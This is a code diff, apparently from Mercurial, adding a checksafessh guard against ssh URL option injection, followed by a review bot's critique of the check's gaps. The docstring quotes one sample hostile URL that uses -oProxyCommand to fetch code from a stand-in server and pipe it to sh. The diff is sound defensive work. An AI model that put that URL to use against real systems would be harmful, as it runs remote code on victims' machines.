@@ -2894,6 +2894,21 b' def hasdriveletter(path):' | |||||
2894 | def urllocalpath(path): |
|
2894 | def urllocalpath(path): | |
2895 | return url(path, parsequery=False, parsefragment=False).localpath() |
|
2895 | return url(path, parsequery=False, parsefragment=False).localpath() | |
2896 |
|
2896 | |||
|
2897 | def checksafessh(path): | |||
|
2898 | """check if a path / url is a potentially unsafe ssh exploit (SEC) | |||
|
2899 | ||||
|
2900 | This is a sanity check for ssh urls. ssh will parse the first item as | |||
|
2901 | an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. | |||
|
2902 | Let's prevent these potentially exploited urls entirely and warn the | |||
|
2903 | user. | |||
|
2904 | ||||
|
2905 | Raises an error.Abort when the url is unsafe. | |||
|
2906 | """ | |||
|
2907 | path = urlreq.unquote(path) | |||
|
2908 | if path.startswith('ssh://-') or '|' in path: | |||
|
2909 | raise error.Abort(_('potentially unsafe url: %r') % | |||
|
2910 | (path,)) | |||
|
2911 | ||||
2897 | def hidepassword(u): |
|
2912 | def hidepassword(u): | |
2898 | '''hide user credential in a url string''' |
|
2913 | '''hide user credential in a url string''' | |
2899 | u = url(u) |
|
2914 | u = url(u) |
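Review bot: The guard in `checksafessh` is a literal prefix match on the unquoted string, so it only recognises the exact lowercase `ssh://-` spelling, while the `'|' in path` half runs on every argument whatever its scheme. If callers pass anything other than ssh URLs (the call sites are not visible in this hunk), a legitimate local path or http URL containing a pipe would abort, and other schemes that end up invoking ssh, such as `svn+ssh://`, are not covered by the dash check. Consider keying the test on the parsed scheme and host, or at least using `if path.startswith(('ssh://-', 'svn+ssh://-')):` with the pipe test limited to ssh URLs, and extend the docstring to say which schemes are in scope. As defence in depth, the code that builds the ssh command line could itself refuse a host beginning with `-`, so the protection does not depend on every caller remembering to call this helper.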